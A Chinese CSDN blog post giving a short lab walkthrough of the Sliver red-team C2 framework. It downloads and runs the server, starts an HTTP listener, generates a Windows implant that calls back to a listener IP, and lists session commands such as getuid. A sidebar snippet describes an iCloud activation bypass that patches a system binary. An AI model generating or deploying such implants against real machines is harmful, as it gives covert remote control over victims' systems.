sliver

最新推荐文章于 2024-05-29 09:40:11 发布
最新推荐文章于 2024-05-29 09:40:11 发布
阅读量419 收藏 1
点赞数
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567689/article/details/128290307
版权

简介:

Sliver 是一个基于Go的开源、跨平台的红队平台,可供各种规模的组织用于执行安全测试。

Sliver 的支持 C2 over Mutual-TLS、HTTP(S) 和 DNS等协议。

implant可以时时编译生成,并会使用证书进行加密。

服务器和客户端以及implant都支持MacOS、Windows 和 Linux。

源码地址:

https://github.com/BishopFox/sliver

根据不同的情况进行使用与下载

使用说明:

https://vk9-sec.com/how-to-set-up-use-c2-sliver/

下载服务端:

https://github.com/BishopFox/sliver/releases/tag/v1.5.31

下载完成后,解压

unzip sliver-server_linux.zip

解压完成后,将程序运行

这里我将程序修改名为了{sliver}

./sliver

创建完成后,开启一个简单的监听端口

{与kali开启监听相同}

http -l 8888

利用sliver生成一个监听模块,放到客户端进行运行,得到反弹信息

generate --http http://192.168.5.59:1234

得到后缀为exe的文件,这里我们直接在本地进行尝试与实验

大家也可以自我尝试

可以看到,生成的exe程序放到了默认文件下

拿到权限后可以执行一些操作等

sessions
info
getuid

凯凯_0523
关注
红蓝对抗--sliver 搭建
问题很多的小明
12-04 1867
sliver C2搭建与安装过程
SliverV6.2最新版本[SliverV6.2latest]
04-14
A4 / A5 / A6 / A7 Untethered iCloud Bypass iOS 12 / 13 / 14 Untethered iCloud Bypass iOS 12 / 13 / 14 FULL Passcode Bypass iOS 12 / 13 / 14 MDM Bypass 支持的版本如上。 类型:间接Setup.app缓解 目标设备:iPhone 6s - iPhone X、A11之前版本的ipad、iPod Touch 7 工作原理:mobileactivationd二进制文件被重命名并替换为反汇编/修补的副本,对于该副本,所有未激活被更改为激活的。这会欺骗iOS设备以为它具有有效的激活记录,以便跳过设置助理,但实际上没有应用任何激活记录,因此所有需要激活记录才能正常工作的设备功能都不可用。所有不需要激活记录的应用程序都是完全可用的,包括Safari、音乐、相机、照片等等。但是,由于打补丁的二进制文件不能用Apple签名进行共同签名,因此这种绕过
kali 安装 sliver
lihandsome_ls的专栏
04-29 473
kali可以直接使用apt-get安装sliver但是这样安装完的sliver执行的时候会报错,应该是有bug,不知道什么时候会修复,解决办法是从sliver的github下载最新版编译好的sliver_server_linux然后将下载的 sliver_server_linux 把 /bin/sliver-server 和 /usr/bin/sliver-server 替换了。自此安装以及完成。
推荐开源项目:Sliver - 强大的跨平台红队框架
gitblog_00003的博客
05-11 732
推荐开源项目:Sliver - 强大的跨平台红队框架 项目地址:https://gitcode.com/BishopFox/sliver 项目介绍 欢迎来到Sliver的世界,这是一个开源的跨平台对手模拟/红队框架,专为各种规模的组织设计,用于进行安全测试。Sliver提供了一系列高级功能,以帮助你在网络安全评估中达到新的高度。其核心特性包括动态代码生成、编译时混淆以及支持多种通信协议,如mTLS...
直播预告(今晚8点) | 跨平台植入型框架Sliver生成C2
Ms08067安全实验室
03-25 117
哔哩哔哩预约入口↓↓↓课程亮点·0基础入门,拒绝做脚本小子·打造属于自己的专属武器库·掌握安全自动化,提高工作效率·帮助安全人员克服代码恐惧·多语言开发(Java、go、Python),总有一款适合你·提高工具适用性和减少被特征检测攻击行为面向人群01安全爱好者:远离脚本小子,从0讲解安全工具开发,打造属于自己的专属武器库。02安全从业人员:有一定编程基础,但代码经验不足,想增加安全开发技能,提高...
更新公告/unc0ver 4.2.1版发布
qq_34718767的博客
02-27 1267
更新提示网站证书24号更新完毕后又掉了,今天早上掉了后抓紧更新了一波新证书,目前资源站已经的软件已经可以正常下载了,下载方法很简单,老粉丝都知道,这里我在说一下吧!只需要在微信公众号:‘...
获620万美元融资!SLIVER.tv将推出VR电竞视频平台
weixin_34026276的博客
03-07 108
“VR+电竞”似乎备受风投企业青睐。 虚拟现实与电竞结合并不算新鲜,《Dota2》、《坦克世界》和《英雄联盟》等热门游戏都曾开放过VR观战以及直播,但是没有实现真正的VR电竞,即众多玩家们联机玩VR游戏。日前,SLIVER.tv宣布获得620万美元的种子轮股权融资,并即将推出一个VR电子竞技娱乐平台。 据悉,DCM风投、Sierra风投、VR基金、...
sliver C2 切换会话
qq_38236017的博客
08-17 119
使用中发现会话的切换直接输入sessions,显示会话。在测试进程迁移的时候发现命令不好用。use 切换到新会话。多次尝试,没有成功的。
探索RogueSliver:反制Sliver C2框架的利器
最新发布
gitblog_00018的博客
05-29 885
探索RogueSliver:反制Sliver C2框架的利器 项目地址:https://gitcode.com/ACE-Responder/RogueSliver 在网络安全领域,了解并对抗恶意软件是至关重要的一环。今天,我们向您推荐一个名为RogueSliver的开源工具集,它专为揭示和扰乱使用Sliver C2框架的恶意活动而设计。这个项目不仅提供了深入的技术洞见,而且通过其实用的工具,让防御...
Silverlight 2学习教程(五)
天将降大任于斯人也
05-31 689
要实现JavaScript调用Silverlight程序里面的托管代码,需要先在应用程序的启动(Application_Startup)事件里注册要进行访问的对象,而要从Silverlight的托管代码里访问HTML页面对象或者页面中的JavaScript,使用HtmlPage的Document/HtmlElement和HtmlWindow即可。下面,我们就以例子来说明两者相互访问的方法,代码
Flutter组件--Slivers的基本使用
eastWind1101的博客
03-21 928
我们考虑一个这样的布局:一个滑动的视图中包括一个标题视图(HeaderView),一个列表视图(ListView),一个网格视图(GridView)。我们怎么可以让它们做到统一的滑动效果呢?使用前面的滚动是很难做到的。Flutter中有一个可以完成这样滚动效果的Widget:CustomScrollView,可以统一管理多个滚动视图。在CustomScrollView中,每一个独立的,可滚动的Widget被称之为Sliver。
Silverlight 2学习教程(四)
天将降大任于斯人也
05-31 757
VS在编译时Silverlight 2的应用程序时,会先将cs等文件进行编译成dll,然后会调用Chiron.exe这个打包工具打包成.xap文件。也可以使用它进行动态语言无打包部署。Chiron.exe一般位于C:/Program Files/Microsoft SDKs/Silverlight/v2.0/Tools/Chiron文件夹下,.xap格式的文件其实就是一个zip格式的压缩包,如果将
6.2 网络钓鱼攻击
热门推荐
qq_55202378的博客
08-13 2万+
网络钓鱼 error
Sliver RecyclerView 功能最强大、最好用的适配器
qq_35959231的博客
05-19 187
### RecyclerView的正确使用姿势 ##### 自从事android开发已有五年,一直对android 的适配器模式抱一个怀疑态度,从设计的角度上考虑,确实这样便于扩展,便于高度自定义,但对于绝大多数应用场景的开发人员来说,实际并不友好。 ##### 还记的你是怎么使用RecyclerView进行开发的么? 1. ###### 小白使用方式(最原始基础的) ``` class MyAdapter:RecyclerView.Adapter<RecyclerView.ViewHolde.
【高级持续性威胁跟踪】红队视角看Sunburst后门中的TTPs
further_eye的博客
01-04 2483
最近FireEye披露的黑客组织入侵SolarWinds的供应链攻击让安全从业人员印象深刻。一是影响规模大,SolarWinds官方称受影响的客户数量可能有18000家。二是攻击者留下的后门程序-Sunburst,十分隐蔽和具有迷惑性。
红队工具记录
makaisghr的专栏
07-18 1180
红队工具记录
Flutter Sliver大家庭之Sliver实战④
高级开发者进阶ing... QaQ
12-25 1597
Flutter Sliver大家庭之Sliver实战 暗恋的人总是经过一段暗恋后变得坚强,也已成长,成长到接受别人的爱,亦或去追求所爱,而这一切,好像与那个人无关。那个人何其无辜,被爱时他丝毫不知情,被爱后别人的坚强也好似和他无关,但不得不承认,他无意中造就了一个人的蜕变和成长,所以,那个人,又是何其伟大。 今日效果图: 效果图(1.1): 分析: 使用NestedScrollView完成(滑动组件是用来处理复杂情况下的滑动应用场景,如向上滑动视图时,要折叠隐藏一部分内容,这时候就需要使用到 Nes
sliver4.2.2
07-27
Sliver是一种用于构建滚动效果的Widget。在Flutter中,滚动效果可以通过将子Widget包裹在一个滚动容器中来实现,而Sliver正是用来创建这样的滚动容器的。 Sliver4.2.2是Sliver的一个特定版本或常用的配置。具体来说,这个版本可能会包含了一些特定的修复或更新,通过使用这个版本,可以确保在滚动过程中的性能和用户体验得到最佳的保证。 在Sliver中,可以根据需要选择不同的配置,以满足不同的滚动需求。例如,SliverAppBar可以创建一个可以随着滚动而收缩的应用栏,SliverGrid可以创建一个可以滚动的网格布局,SliverList可以创建一个可以滚动的列表等等。 Sliver的工作原理是,它会根据滚动的位置动态生成和回收子Widget,以提高性能和减少内存消耗。滚动容器会根据屏幕大小和滚动位置自动调整子Widget的显示范围,只显示在屏幕内可见的部分,而不需要一次性加载所有的子Widget。 在使用Sliver时,需要注意一些常见的问题。例如,滚动容器的内容不要过于庞大,以免消耗过多的内存和CPU资源。另外,对于需要处理用户手势的滚动效果,应该正确处理滑动事件,以提供良好的用户体验。 总之,Sliver4.2.2是一个用于构建滚动效果的Widget版本,在Flutter中使用Sliver可以轻松创建各种类型的滚动容器,并且可以根据具体的需求进行自定义配置,以满足不同的滚动需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值